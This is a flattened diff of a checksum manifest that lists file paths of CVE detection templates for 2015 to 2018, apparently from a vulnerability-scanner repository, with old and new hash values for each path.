-http/cves/2016/CVE-2016-10108.yaml:e324234009705dc64a2f9f4486fbd693ccbb7618 -http/cves/2016/CVE-2016-10134.yaml:882508e136dc9aa4f2ca2ee2a3aec850c7ac6c86 -http/cves/2016/CVE-2016-10367.yaml:2ffb8a2aede4f91fce2cd078a5240b9a020d6713 -http/cves/2016/CVE-2016-10368.yaml:3914d773661194926456b45c17111ef213c32af0 -http/cves/2016/CVE-2016-10924.yaml:74603215b7443a5926abe6096ec38847376e620d -http/cves/2016/CVE-2016-10940.yaml:7c906a44ae7bdd88d6aa5a02c530fccfe7088568 -http/cves/2016/CVE-2016-10956.yaml:c9f11dd7738a630227f8dab0bf7923d4b093dbd3 -http/cves/2016/CVE-2016-10960.yaml:67ae99dada51c5522fe1706682cb0521cbb2235b -http/cves/2016/CVE-2016-10973.yaml:2b26e0b400b3dbb4f5ab3c77b75032ca5ac2fb94 -http/cves/2016/CVE-2016-10993.yaml:26ce19d0747cf31dcd8794e91a6c004aac4be823 -http/cves/2016/CVE-2016-1555.yaml:7e372b79bcc3592ad5f2cc0f55732e62a046f339 -http/cves/2016/CVE-2016-2389.yaml:d1e22b8d79052376220f848516bc880e37f00ef0 +http/cves/2015/CVE-2015-8813.yaml:f7d4d310567cae59aa0f76bd520556a8331681c0 +http/cves/2015/CVE-2015-9312.yaml:26cc56a680234dbfb7cd30adea4f2cc55df99cd7 +http/cves/2015/CVE-2015-9323.yaml:54e5d42c2fbabda7d6e64fcbdaec5b793355f563 +http/cves/2015/CVE-2015-9414.yaml:50f1a5efd55dbb37f9da005e464108b7087a7ae2 +http/cves/2015/CVE-2015-9480.yaml:36c3618f34af5a07c2fde182f0025fa4a6eb8050 +http/cves/2016/CVE-2016-0957.yaml:0a5f245f81041daf4f37e32d3aeafc717429c7d8 +http/cves/2016/CVE-2016-1000126.yaml:4ed4c788cfa76335a17293e68d70031350aa429b +http/cves/2016/CVE-2016-1000127.yaml:8bd2111fa82e8d97ae6634ba3cca56fe62006d8e +http/cves/2016/CVE-2016-1000128.yaml:91e5dd4bb6a4a120449b68ec0b87a770597acf59 +http/cves/2016/CVE-2016-1000129.yaml:380b389618a830e67b7185acc0aa99be98e97d7d +http/cves/2016/CVE-2016-1000130.yaml:211e615314c44e6c2a82110800bfe19750b19219 +http/cves/2016/CVE-2016-1000131.yaml:b531f81ccb471bc1c72fa473bdcdff3fe7c830d5 +http/cves/2016/CVE-2016-1000132.yaml:005b1e4c77ff587033e06745a6e3c44b392fcdf9 +http/cves/2016/CVE-2016-1000133.yaml:689dfeefcc328ca6cc814b1475165ca9b9347e8f +http/cves/2016/CVE-2016-1000134.yaml:882a3cb70218e8d9b817451112e60930a96d5265 +http/cves/2016/CVE-2016-1000135.yaml:5ce585dbb0be587d8dd6ef25dc6aa7d489370bde +http/cves/2016/CVE-2016-1000136.yaml:b6f87b23d9cf1ab74368c44ec89c9125666cc71e +http/cves/2016/CVE-2016-1000137.yaml:1f46f72e669091e7b939cfc9f782fd46d41dbe71 +http/cves/2016/CVE-2016-1000138.yaml:8a2106f5073b0fb5553200eb83432f4aaaeaa38a +http/cves/2016/CVE-2016-1000139.yaml:e79f6d7170f90ffeda21207595f2215e034818ca +http/cves/2016/CVE-2016-1000140.yaml:e3b29cf8b51071e922cc957cbceb23263364966a +http/cves/2016/CVE-2016-1000141.yaml:e63670dbd06673577de56c3d92786b668991d441 +http/cves/2016/CVE-2016-1000142.yaml:5a8046dc149bd3d26ce884a69a8559a61c4593fb +http/cves/2016/CVE-2016-1000143.yaml:0404dcf8659817bbe0be01b62f7ee7710dacaea4 +http/cves/2016/CVE-2016-1000146.yaml:3662c45a41ca4fbca98e304543bd2e081a0476f1 +http/cves/2016/CVE-2016-1000148.yaml:aa2888ada773fa6d06f40555aa37acff2ed08b1a +http/cves/2016/CVE-2016-1000149.yaml:dec99b14fccc7ae2847a320a6172527acbb6e54e +http/cves/2016/CVE-2016-1000152.yaml:72b7a0b1c8c2caff6185094a935baec92b29265e +http/cves/2016/CVE-2016-1000153.yaml:6f95412486f153efc3909d3aec9a5eddf5008ee9 +http/cves/2016/CVE-2016-1000154.yaml:a1cbaeac309467622d70e5a401bcf4e998403cad +http/cves/2016/CVE-2016-1000155.yaml:20857e3fceca44190ef70b202600b858f66c4151 +http/cves/2016/CVE-2016-10033.yaml:edaa372d6669259f790ccc45b649ac9daf3224f0 +http/cves/2016/CVE-2016-10108.yaml:239c911900ad86f2a63c1e1170e614cb0014c45c +http/cves/2016/CVE-2016-10134.yaml:2098ac6b8a1aa99d0e1fc50491b584a95956bf67 +http/cves/2016/CVE-2016-10367.yaml:346b4ad463b0d7640a1f0c63e2af3649eab06ad7 +http/cves/2016/CVE-2016-10368.yaml:225dcfc22f89af13e6a08a6a1be0b6be74fc1298 +http/cves/2016/CVE-2016-10924.yaml:17d480fd98d033c2fc75a95d5f2dea1a2962e192 +http/cves/2016/CVE-2016-10940.yaml:8e31a48ec4af77757b34af7bca255260b045925c +http/cves/2016/CVE-2016-10956.yaml:d7672a6165ce37fd5e4e20cc4d33bdb7c88effae +http/cves/2016/CVE-2016-10960.yaml:c2a7ec8e0f4f1467b080b7add6b921f6f970e519 +http/cves/2016/CVE-2016-10973.yaml:83d1cb2c21990eeeae6e9c6109f4f3c287875645 +http/cves/2016/CVE-2016-10993.yaml:9e6a812e0b51cbbce68936b1ad9875562d002418 +http/cves/2016/CVE-2016-1555.yaml:43a3e270adf407aed073e431584dc0171f3fd8ad +http/cves/2016/CVE-2016-2389.yaml:7e78d84b7d2c5b1f85591cbaab4384f81f6ae574 http/cves/2016/CVE-2016-3081.yaml:a0cacaef1341e95df63b04a33f5d33663ee34c1f -http/cves/2016/CVE-2016-3088.yaml:8a332513b20fb9f53c6cb4ef832cb042a300c3cd -http/cves/2016/CVE-2016-3978.yaml:c993aa719327c56aaa4ebf337d733af81149ea35 -http/cves/2016/CVE-2016-4437.yaml:8592dbc793a0a10c369682d43dd9574dd52c05a6 -http/cves/2016/CVE-2016-4975.yaml:a16d073a4883d5b84b5497e9101c6faca8e0ca1c -http/cves/2016/CVE-2016-4977.yaml:5bc29383482baafb80ad26da79572f3fb5405117 -http/cves/2016/CVE-2016-5649.yaml:3040a4cc8ad3d85c484f86243b4cb70d80a59e77 -http/cves/2016/CVE-2016-6195.yaml:2046388eb1db15f86005c2dc9c1151760b5f0d88 -http/cves/2016/CVE-2016-6277.yaml:006711969c0899feca65bb306cc770d87aecc149 +http/cves/2016/CVE-2016-3088.yaml:e869af889bdafe9be7d599a6f46aa79b1ecc55e8 +http/cves/2016/CVE-2016-3978.yaml:91dc6778de11c164a4de811ef29c56e79a659976 +http/cves/2016/CVE-2016-4437.yaml:ea33ce1c373bec99c04ff98a20b4f603535e7bc5 +http/cves/2016/CVE-2016-4975.yaml:a1c77625ee66343849fe8805f9436f1c3fffd715 +http/cves/2016/CVE-2016-4977.yaml:803e93ad963ce57c92c2303e08bb64b8e636b6d0 +http/cves/2016/CVE-2016-5649.yaml:db96acae427e35bddd72dcaab10a5dc69812f5c7 +http/cves/2016/CVE-2016-6195.yaml:afe6bf52e9214cfd9dcb8fbf1e716f736ac94c8d +http/cves/2016/CVE-2016-6277.yaml:926e2cf7fb06915c9b99e1064a7b3aa39ed1f04a http/cves/2016/CVE-2016-6601.yaml:87a3cc98117de752e21b4bed5d478586387c27cf http/cves/2016/CVE-2016-7552.yaml:e98423ac7941ae1d06e2c488cab86141cef3fa36 -http/cves/2016/CVE-2016-7834.yaml:a24e489bc5fc62b8f608234530c9085f6691804d -http/cves/2016/CVE-2016-7981.yaml:9e875b158ec46aeaa2f525e5cf7d85aeb373c96e -http/cves/2016/CVE-2016-8527.yaml:48cf19350d917a00a7471ec2184ecfdd757769f9 -http/cves/2017/CVE-2017-0929.yaml:78445f4ebcb9c4cd8db061f40a602a0c0dca5f45 +http/cves/2016/CVE-2016-7834.yaml:1ed834a5cbcb068898ef1c41fca5ccd0b29da2fd +http/cves/2016/CVE-2016-7981.yaml:d93f9419f82e4f58de025ebeca4bd49ee16b7732 +http/cves/2016/CVE-2016-8527.yaml:62e04a2c6eb9beebf24a467cded3779a42d067b0 +http/cves/2017/CVE-2017-0929.yaml:b4e38ac2d3abe949282abd9bddbe5b9ba90f61e8 http/cves/2017/CVE-2017-1000028.yaml:1d2ad80af3e686ae5c7e60e6bfa486c875926c5e -http/cves/2017/CVE-2017-1000029.yaml:580376ecf00ff97715bbe7e464fb4cc36c06bfad -http/cves/2017/CVE-2017-1000163.yaml:2e09adb0f2f1725a4f3f1f0652dedd6bb653cf6d -http/cves/2017/CVE-2017-1000170.yaml:1c163d27714dbf30844494d21bd36f7a53a60bc1 -http/cves/2017/CVE-2017-1000486.yaml:a6d51881322a5b42926eae5d7ebf01fb548e0e2d -http/cves/2017/CVE-2017-10075.yaml:f5855d17d3159ef2891d11116779660c6836d7db +http/cves/2017/CVE-2017-1000029.yaml:b21d76ddb5ffe4a94256938823c3bd655b33c2fe +http/cves/2017/CVE-2017-1000163.yaml:a5f51c2f101ba61128a3b744138f2a84eaea11af +http/cves/2017/CVE-2017-1000170.yaml:e2ce19a2578dce6f64bec6dbab0aa0fb5c25cf46 +http/cves/2017/CVE-2017-1000486.yaml:2028f2189dd6a2867f3ac2883f7166a6316e28ba +http/cves/2017/CVE-2017-10075.yaml:43552ec410ac02d98f588acb2c0334c23db27f23 http/cves/2017/CVE-2017-10271.yaml:d491104d4e9533329f27d45146063dd7b9bd3d32 -http/cves/2017/CVE-2017-10974.yaml:5fd8ee2be0b71efd342f89dab810636202d896b9 -http/cves/2017/CVE-2017-11165.yaml:bb09d7a47c9d5bbf9d13ee2d32291dba5a2e90b8 -http/cves/2017/CVE-2017-11444.yaml:9dcfbd3f1a0fcfb36f52b3cdab7e5f4a96d9e96d -http/cves/2017/CVE-2017-11512.yaml:3c187ea7d1b43d724a68cabe652d0345531fb3ae -http/cves/2017/CVE-2017-11586.yaml:8c499a9594e3259134e9b0fa50b21e926df64ba9 +http/cves/2017/CVE-2017-10974.yaml:8f6f298998f820a031850aa3f5ad31c8bcdfa6fd +http/cves/2017/CVE-2017-11165.yaml:1e5d11d4e4287ee8d33760e237263c9f56e308a7 +http/cves/2017/CVE-2017-11444.yaml:038ec84a48095f34dda0a88ddedf1ca32f2a4b2f +http/cves/2017/CVE-2017-11512.yaml:d3fd28986611d668fd95b2af85fa7524f9e36242 +http/cves/2017/CVE-2017-11586.yaml:1ce6ca5f7a09a8b4e796c4142f8c3da340eda81d http/cves/2017/CVE-2017-11610.yaml:d65650c579eca57f3cddbef4b45ed3fc125f71de -http/cves/2017/CVE-2017-11629.yaml:2d5014b59228a8ab430cd0d5d7dcb61b1ae71ec3 -http/cves/2017/CVE-2017-12138.yaml:bc2e758bdef0c11e0f4234e3d550a44f71da8461 +http/cves/2017/CVE-2017-11629.yaml:5585eb333e6ba50a74066a4ee058b74b11d2b72e +http/cves/2017/CVE-2017-12138.yaml:a9d5192162935499d0ea1d5a4a39202c0d85ec5c http/cves/2017/CVE-2017-12149.yaml:36a1bbebcfdd62ea32c3ec9e30589c86a9bad553 -http/cves/2017/CVE-2017-12542.yaml:103dbaa965dfad41abfc8d124a0e1dc906a05ef3 -http/cves/2017/CVE-2017-12544.yaml:323e7e4e0f9a9a93898d275e89d7661e87421769 -http/cves/2017/CVE-2017-12583.yaml:b42e8868fe2ade4fbe380491e195574919384c73 +http/cves/2017/CVE-2017-12542.yaml:2d0b299c301bcf60fccb1fd16e29c469f80d2707 +http/cves/2017/CVE-2017-12544.yaml:443162032a4d1c07ec5f688f398295f1e4436cb9 +http/cves/2017/CVE-2017-12583.yaml:b3f47bb322ddd5510956391ed29be818d31fd322 http/cves/2017/CVE-2017-12611.yaml:6c7d56f5de2e8218e3247981d2c3413b72cd3a8d -http/cves/2017/CVE-2017-12615.yaml:d60b651ea59185beaf14f8de18e708932c004505 -http/cves/2017/CVE-2017-12617.yaml:3105bb10ea53d324452cef50cece09334bba73c8 +http/cves/2017/CVE-2017-12615.yaml:b28980d7040d578cbb6f4ad36d69e22975ba94dc +http/cves/2017/CVE-2017-12617.yaml:f252b2ad3caf70e68544599b0561edc0cf4f9928 http/cves/2017/CVE-2017-12629.yaml:ac3ccb9c808947506bef16d7ca95f6617b567c39 http/cves/2017/CVE-2017-12635.yaml:8ad42aac15973767a778ff7f20dea04c20cb3a5f -http/cves/2017/CVE-2017-12637.yaml:406e79a5c4376949f788bb388ed2707936633d21 -http/cves/2017/CVE-2017-12794.yaml:e3b293366805f65a82488e55a201beebb2d4a8e9 -http/cves/2017/CVE-2017-14135.yaml:5935f25c30f96318b6a999d6b67f76c03dd0a8b6 -http/cves/2017/CVE-2017-14186.yaml:95b3194d7b1a68e687b546d88b7f1fb4f01b5b0d -http/cves/2017/CVE-2017-14524.yaml:ed0506f6c1c632492aa0d4ad6ddbc6360fdbb9f9 -http/cves/2017/CVE-2017-14535.yaml:863224ac4b2d9e2a61550c022490168f18e880ac -http/cves/2017/CVE-2017-14537.yaml:2bcc0b97e39aff8a621c4863901d635d23ed65df -http/cves/2017/CVE-2017-14622.yaml:7219a14e2501d27cdd3bdfaf17ef4ceeef0793a8 -http/cves/2017/CVE-2017-14651.yaml:5d207b552693490cc99fc40e7bab96a1329e8ef5 -http/cves/2017/CVE-2017-14849.yaml:9d53860dbfc6988b5b302d38fcbdaba57d907216 -http/cves/2017/CVE-2017-15287.yaml:254057045e5cc856a6997d9ba28a3dab2756cffa -http/cves/2017/CVE-2017-15363.yaml:58741421c7bdf3f59e92908964d50e84dfefd77e -http/cves/2017/CVE-2017-15647.yaml:2eac046c7e737ef1a95d90c5be807d1d33e84252 -http/cves/2017/CVE-2017-15715.yaml:202ef07d1d1eb5d279f97bcbd6c4a47fed4ff514 +http/cves/2017/CVE-2017-12637.yaml:ef5595a7677d99bdbb46fb0eb81e5e30978f21a5 +http/cves/2017/CVE-2017-12794.yaml:041652c841851e48a9e0c89a79c1b2f6a58ca988 +http/cves/2017/CVE-2017-14135.yaml:d2767616fc8e658720f4c98d7ce1974dea03d410 +http/cves/2017/CVE-2017-14186.yaml:d07d30134ecdbe6544c242f5194c2998b0a8133d +http/cves/2017/CVE-2017-14524.yaml:adb44897f1c85b9959840cd5d5369d9da4c10b4c +http/cves/2017/CVE-2017-14535.yaml:6cac4fffcffcc3dba9ba68efa19f0922b3f5d372 +http/cves/2017/CVE-2017-14537.yaml:5920ddc0ba58e68c5651fa962e1794b477b6f9f5 +http/cves/2017/CVE-2017-14622.yaml:f7f74bcd0d15380aad4f9f41697501c6f1a4a7cc +http/cves/2017/CVE-2017-14651.yaml:6e977c369a9a5ff57d979d0575213670f0ae4f01 +http/cves/2017/CVE-2017-14849.yaml:899cc83161fc57f197bc09ec097fb9498fde9137 +http/cves/2017/CVE-2017-15287.yaml:d3eb6ec036324330758e54655b531e1f3607db1e +http/cves/2017/CVE-2017-15363.yaml:42a89ea68b1e1d1ef6020e6d846ea4ca86838ffb +http/cves/2017/CVE-2017-15647.yaml:2c6eb505d9b9fe1fd94253511b21c40c04b008d7 +http/cves/2017/CVE-2017-15715.yaml:c9525bb5d942219da322db5857796304de67f90b http/cves/2017/CVE-2017-15944.yaml:9beae0a673dea9c479744f16a8bedfd1aef47c75 -http/cves/2017/CVE-2017-16806.yaml:d75db5cf58753175cce7f3115630ff82715f05e0 -http/cves/2017/CVE-2017-16877.yaml:a5f8dce5f85bfd25b43a0de5799f9cc673faa3f2 -http/cves/2017/CVE-2017-16894.yaml:fd54d9cc6fddfd7ee1a8b953a5e1f79e400264ed -http/cves/2017/CVE-2017-17043.yaml:7cbc4ec4ddbbfb21dbc0f2f11de1abd3f329d7e9 -http/cves/2017/CVE-2017-17059.yaml:b16fe513322b7908938532649a3390d77f37b37e -http/cves/2017/CVE-2017-17451.yaml:12797a7bdda9fe75ff74450683fe635b72ee576f +http/cves/2017/CVE-2017-16806.yaml:2898eb309712677478b0e1848de4f0ece4899034 +http/cves/2017/CVE-2017-16877.yaml:69ee9add69cf376aa11d9c8f0e83970f17467625 +http/cves/2017/CVE-2017-16894.yaml:b6027ad40303a7f67d917fa4297c92d4a0ec8618 +http/cves/2017/CVE-2017-17043.yaml:ea686cb7f44260f639401d7d2a452de6820b5b4b +http/cves/2017/CVE-2017-17059.yaml:5265f766af92faadc97877ee82633acded58be6c +http/cves/2017/CVE-2017-17451.yaml:c821d29b57aa954c0192cddeb7d444103a2c60fb http/cves/2017/CVE-2017-17562.yaml:1dcb93bbed45f9fc787e76aced34368a4995c7d0 -http/cves/2017/CVE-2017-17731.yaml:ca1e5b46bdffc5fe50cd59714eb327bdd4228331 -http/cves/2017/CVE-2017-17736.yaml:dfc1cebe83807196b83adedf23ae2b467f00b53e -http/cves/2017/CVE-2017-18024.yaml:4ba92f756e6cd537c4b344f7ded7a72619d6526b -http/cves/2017/CVE-2017-18487.yaml:b900458630f0396fad7f48e3442bcac64fc33003 -http/cves/2017/CVE-2017-18490.yaml:c2f1a1d21bac9fca7fd9304c18aa6c399044312c -http/cves/2017/CVE-2017-18491.yaml:7a4567e84a8f3f68156858cac6e80827a6967a8a -http/cves/2017/CVE-2017-18492.yaml:9812aea2361a97f4d895bf88c1b916a0b2e31813 -http/cves/2017/CVE-2017-18493.yaml:cbff70f13bef37508102f909b61c9b6ba3fb19e1 -http/cves/2017/CVE-2017-18494.yaml:4e2508e44ec56ce1b68f300354687f82a6b900df -http/cves/2017/CVE-2017-18496.yaml:3cb511683d54da44134444e477c6d7cf93b7ad91 -http/cves/2017/CVE-2017-18500.yaml:bc3d409178ba8ad9b03b1efac64336556f299368 -http/cves/2017/CVE-2017-18501.yaml:efe8280bd9965baa3a409b057813826e072596ea -http/cves/2017/CVE-2017-18502.yaml:6c9c76698a05c87a509d6c18522fb46d7b5d7774 -http/cves/2017/CVE-2017-18505.yaml:7a4ad3ed8f2b0083a50afeb7f2338f8eb1c36717 -http/cves/2017/CVE-2017-18516.yaml:e50bbe5e44a1a3d23d7e5185ce2ab3b27c47f5d4 -http/cves/2017/CVE-2017-18517.yaml:3bdd5df136309e660039c811ed40f0d8851c01e2 -http/cves/2017/CVE-2017-18518.yaml:97adf4629f86b310450795f66a7d64ac3052469e -http/cves/2017/CVE-2017-18527.yaml:2d0dcee1014997a726829ed787304a482fb1a488 -http/cves/2017/CVE-2017-18528.yaml:ef31cf97fa9550a5b1483f876d102b4380d29bf2 -http/cves/2017/CVE-2017-18529.yaml:79e424bfea4e78b9f74448d0d1a36f492bd51189 -http/cves/2017/CVE-2017-18530.yaml:a692a6ef864d7b2f1b024a71fdb0112067ab72a6 -http/cves/2017/CVE-2017-18532.yaml:974214d00d2f489612ad1e79b45591addea8bcdd -http/cves/2017/CVE-2017-18536.yaml:c98925957a412fdb2e55b8176a2cf48188f7576a -http/cves/2017/CVE-2017-18537.yaml:929550fb01341205836385c2e36b5cde3105150f -http/cves/2017/CVE-2017-18542.yaml:7a077f0ef8331d7d280b1de32de0307e64f8780a -http/cves/2017/CVE-2017-18556.yaml:17990293db64ea959a8b3f8431f254d50af91976 -http/cves/2017/CVE-2017-18557.yaml:a14aec3b12ad89165894a3f24a89e07e034def49 -http/cves/2017/CVE-2017-18558.yaml:00652e719c20b0502a8c953a6b148c11f800d77a -http/cves/2017/CVE-2017-18562.yaml:01ac3e2d930cad4a5759d2078fac774d5b2544f8 -http/cves/2017/CVE-2017-18564.yaml:2789fa50a58d1126ca240ab8d16f1a6bbed7e5b9 -http/cves/2017/CVE-2017-18565.yaml:edf57d6dd79311a3e5bb890ebaa3e672b041a33b -http/cves/2017/CVE-2017-18566.yaml:502c1f441fe1235dca40385bd1c2a841c2358682 -http/cves/2017/CVE-2017-18598.yaml:e1aa2c38306618122044a01eb878667dee1cc48c -http/cves/2017/CVE-2017-18638.yaml:4528e98cb81f74d51dd8f8aad3e52f678452eeea -http/cves/2017/CVE-2017-3506.yaml:16c933caabc00f15c2fcda67d3eb8d8c17424b1f -http/cves/2017/CVE-2017-3528.yaml:850f88b58f59894e5c8a2a4aaaa57d71aa69fbf8 -http/cves/2017/CVE-2017-4011.yaml:41e7f8dd410b6efafdc9943402aefa9b087cfb6e +http/cves/2017/CVE-2017-17731.yaml:a6ad590d5fb2f6f30c3263a60f3523d021cd079b +http/cves/2017/CVE-2017-17736.yaml:6264c4d41e294555ba0ad3780fa1a28ee42b42b2 +http/cves/2017/CVE-2017-18024.yaml:1419e46ff89bc4e52473d64f24cdb66a29f4c6ee +http/cves/2017/CVE-2017-18487.yaml:47d5e0010fc094192dae9315ae5acbc15a80a274 +http/cves/2017/CVE-2017-18490.yaml:7b44bc4e0f897bd8fe440b3e02d53ecd011c287e +http/cves/2017/CVE-2017-18491.yaml:7b5052aea2653ed38676d0348abafa7f310cbef0 +http/cves/2017/CVE-2017-18492.yaml:a46f62a109e819f8c556d0fc31aa58ad39ea9b1b +http/cves/2017/CVE-2017-18493.yaml:a5e1016a67c61cafc941dab77061d8c5cd19d72b +http/cves/2017/CVE-2017-18494.yaml:b83b18c250d7366dd363a3886c56f8a62a05fe2e +http/cves/2017/CVE-2017-18496.yaml:8f7cef1f6bc606cd547a4249b8779811277d3418 +http/cves/2017/CVE-2017-18500.yaml:0e84a128c9cf649a0103824c29ac72936b5a70b3 +http/cves/2017/CVE-2017-18501.yaml:504bbb1d8c38348f729e9d6413423b3a8dbdd4ba +http/cves/2017/CVE-2017-18502.yaml:4b288ea980cfb6e49abf2f8934a5cbb6a329d6bc +http/cves/2017/CVE-2017-18505.yaml:1fabbcf344b5004afdbc2e30a41761214e8b52a1 +http/cves/2017/CVE-2017-18516.yaml:58243768f18019b28e05bc37700ff62aeda2399c +http/cves/2017/CVE-2017-18517.yaml:68b8e8614f4b3cf66a4505c228dc32d98aba070d +http/cves/2017/CVE-2017-18518.yaml:76d8328a50d10fe903950d88acc9297f9c19e94e +http/cves/2017/CVE-2017-18527.yaml:3380c510a7b6f444375f0c208ef52456c6b08ad7 +http/cves/2017/CVE-2017-18528.yaml:68e7e40c3b24237c6c1694d3f41a0042839113ce +http/cves/2017/CVE-2017-18529.yaml:fb052340f4362cd35f4d33c53232dab76047c38a +http/cves/2017/CVE-2017-18530.yaml:f46785a39aee92dc7b73e145203316a9d79502fb +http/cves/2017/CVE-2017-18532.yaml:8fa123a1298906abdbc3a58982a5ff9d01baaa01 +http/cves/2017/CVE-2017-18536.yaml:b15531b5bfe368ac519839bbf2c275335235e265 +http/cves/2017/CVE-2017-18537.yaml:1176943c5d1061138740bd045138369f22e18b27 +http/cves/2017/CVE-2017-18542.yaml:aa9340fdfd0c0075619e12f8657dde245e31110c +http/cves/2017/CVE-2017-18556.yaml:0c5ec5088583e99e5839ab7f34ab1c3969d939f0 +http/cves/2017/CVE-2017-18557.yaml:fe407dc10de6ccb45b71edeeb7ad139479eb0a22 +http/cves/2017/CVE-2017-18558.yaml:b35812f2e41112837531b04194ecf3afeaf5fedc +http/cves/2017/CVE-2017-18562.yaml:518b6b6aed55738930670907e9f2c7ffe3835805 +http/cves/2017/CVE-2017-18564.yaml:fe3445ebefa95bd343536e2e94d5877b403dcf9c +http/cves/2017/CVE-2017-18565.yaml:cf845ee3d23f815a8dd378e79bb1769cb9b04b43 +http/cves/2017/CVE-2017-18566.yaml:92306942c88ef9cd95f75224cfa97a1d6e7277af +http/cves/2017/CVE-2017-18598.yaml:dc80a186ab00c4ba9e1cb2d36c2b4e4099249c0b +http/cves/2017/CVE-2017-18638.yaml:bd8f927d879aca88562a496d8f88ffa6159d61ff +http/cves/2017/CVE-2017-3506.yaml:90f1b863a23d7fadf956f6be386f6f89955ed267 +http/cves/2017/CVE-2017-3528.yaml:6afa7886a181fcaf86dd8c03d1c7d0db81a391f6 +http/cves/2017/CVE-2017-4011.yaml:44cbd95baebd429ea02a3a36419f443253e9f0b0 http/cves/2017/CVE-2017-5487.yaml:207c8f92c5e2ce856c1aaa238b34779cfb8ab644 -http/cves/2017/CVE-2017-5521.yaml:f3865f0c1aed617750ca107ad5dada50447362e1 -http/cves/2017/CVE-2017-5631.yaml:3c216dec07fbb6f9a6672a4ea7f453be72c15d63 +http/cves/2017/CVE-2017-5521.yaml:96e9bcce31ffc2b46f582aaa5c1f0720926e2231 +http/cves/2017/CVE-2017-5631.yaml:0585d330627ad18a75e2761a435e0e21dad93d38 http/cves/2017/CVE-2017-5638.yaml:35bbc13688e4ec4e1d13602c78e0d1cdc2bb0f31 http/cves/2017/CVE-2017-5689.yaml:8388597c365f47be033e2ab6818211a3200179b1 -http/cves/2017/CVE-2017-5982.yaml:7d9d172a91e79320b51917fe27b0c2c425473839 +http/cves/2017/CVE-2017-5982.yaml:77e9fb0d1bdaccf81ea39705a67d579569d949d1 http/cves/2017/CVE-2017-6090.yaml:0a06423bae5ea9f50365faacad04658e4e122391 -http/cves/2017/CVE-2017-7269.yaml:ea014d633959ad6d0a59ce075b07d831b9edbae4 -http/cves/2017/CVE-2017-7391.yaml:8124b1ceeab4e6fc06f2863ecc351fb3876c3872 -http/cves/2017/CVE-2017-7615.yaml:c69935c8098cbe953fb0ae591807aac826678bdb -http/cves/2017/CVE-2017-7921.yaml:970f6a54b477a526b372b0cc37e6d7ab2668901a -http/cves/2017/CVE-2017-7925.yaml:17a225594967524191bfdb9180f1aa4bd659fe44 -http/cves/2017/CVE-2017-8229.yaml:6706f16db28bd79eb76e8afaaa696efad4c0257f +http/cves/2017/CVE-2017-7269.yaml:4517ca696ac9b3dff98a78cfebcb937b0d65279c +http/cves/2017/CVE-2017-7391.yaml:4a73626f372e45dfd4d4e84716a7b7e2d546c5a6 +http/cves/2017/CVE-2017-7615.yaml:46b73a9232c494e8bf42897cf5550c410fae7089 +http/cves/2017/CVE-2017-7921.yaml:4a3d84c099f8498b2304a36e5fb4f32ecabe6295 +http/cves/2017/CVE-2017-7925.yaml:588b364cc7ea9710377f96886029363e601be47a +http/cves/2017/CVE-2017-8229.yaml:30ebbc38efdeb1970fd4cdf5e4bc7383f295aee8 http/cves/2017/CVE-2017-8917.yaml:83589e7baa37aeffa9401fd6726b1fbf67f8e4b6 -http/cves/2017/CVE-2017-9140.yaml:fb20436dcd7494a682b945a0e74745c7ab2f0ac0 -http/cves/2017/CVE-2017-9288.yaml:f30c93a81c8faec9a5b42e567bd2fd859d0e8efe -http/cves/2017/CVE-2017-9416.yaml:ea7ad7c1bab65accf0055c307dec6413d588952a -http/cves/2017/CVE-2017-9506.yaml:1fd0f534947a2dd4a97f247596566d3ce6ac3ee4 +http/cves/2017/CVE-2017-9140.yaml:6dd50ae0992cdeea934784af47fca3edd7bcdffe +http/cves/2017/CVE-2017-9288.yaml:00dd389c716346b46e297e05554553f9d34f9d78 +http/cves/2017/CVE-2017-9416.yaml:896b045989bc663951d66a896d9be671aab5f28a +http/cves/2017/CVE-2017-9506.yaml:1e1959d9c21bbb9fe6ef3581bbe23e621ab99714 http/cves/2017/CVE-2017-9791.yaml:2e7114610102c29a6b5e4f16b0bee0d90d75e934 http/cves/2017/CVE-2017-9805.yaml:16a849a9bc00a73aa6f751ecbd2f6fff793247da -http/cves/2017/CVE-2017-9822.yaml:af1af6ab50a5f896f8594679c3d7944d28ca1fa9 -http/cves/2017/CVE-2017-9833.yaml:9a625fb78402c80e8a34c00dc5955a75235e465f -http/cves/2017/CVE-2017-9841.yaml:8a18b2715975cdfe0c33fd9e78f0e51a19af2335 -http/cves/2018/CVE-2018-0127.yaml:9e002c6abc5bb25d2ecdaa9f0059a561a37288ad -http/cves/2018/CVE-2018-0296.yaml:26c8bccdeb1e5e1ec359ac163d9c230d96d9b0e5 -http/cves/2018/CVE-2018-1000129.yaml:1f98d821231b7acae7187c5e56f37069538a6278 -http/cves/2018/CVE-2018-1000130.yaml:4593dda8f3904d5cbf0050d43d4b747e41af9a3c -http/cves/2018/CVE-2018-1000226.yaml:58351a6338258d85ae568b95b5c663e89f93896c +http/cves/2017/CVE-2017-9822.yaml:e04cba76ec009d88f311a9d4047c2e8a6be6dfed +http/cves/2017/CVE-2017-9833.yaml:d15751df382197efc68a985fbfbe2b2091aa4bf3 +http/cves/2017/CVE-2017-9841.yaml:ef4b6fc27513ebb74524c614860a40787ceaa029 +http/cves/2018/CVE-2018-0127.yaml:411c1b2d7d4b907a147268c7171eadbcdb91a9e7 +http/cves/2018/CVE-2018-0296.yaml:15d73acd58e04c387f485003dcaac62e8f3eab92 +http/cves/2018/CVE-2018-1000129.yaml:8715b8ee02be77d6497e4ad66b7c98fface453f9 +http/cves/2018/CVE-2018-1000130.yaml:65cfa2935c134f2887597aff2381b4a2b017fdb0 +http/cves/2018/CVE-2018-1000226.yaml:c33cc169965f4fd1be43fed5d647c6c46de5246a http/cves/2018/CVE-2018-1000533.yaml:8285408776c11bdf1933f5915e2331cd59508edb -http/cves/2018/CVE-2018-1000600.yaml:c47aca7947f2896d28a60054e34cb283a9e5b3fd -http/cves/2018/CVE-2018-1000671.yaml:c4986f6a54302343be73772bf170e7f3dfd522a3 -http/cves/2018/CVE-2018-1000856.yaml:e7f42347faa8592d42ef541ea28a069f86dfa807 -http/cves/2018/CVE-2018-1000861.yaml:edd13544afcf97b4da2c05fb13a7e5d8b8ff574c -http/cves/2018/CVE-2018-10093.yaml:1c8a2c1c1cad131dfcdf73e4902695750f14f970 +http/cves/2018/CVE-2018-1000600.yaml:a8b1df0522e7fd52820863b15722a3ef3bcc8e73 +http/cves/2018/CVE-2018-1000671.yaml:bd670fcb18adc574c736a39b83aad4b9534c84ee +http/cves/2018/CVE-2018-1000856.yaml:e466524f8ad9b6dce6aa27c21aa34ec7e6d6e60b +http/cves/2018/CVE-2018-1000861.yaml:e3aa50c136dae24f84ad3eab7ff6e541ae202e06 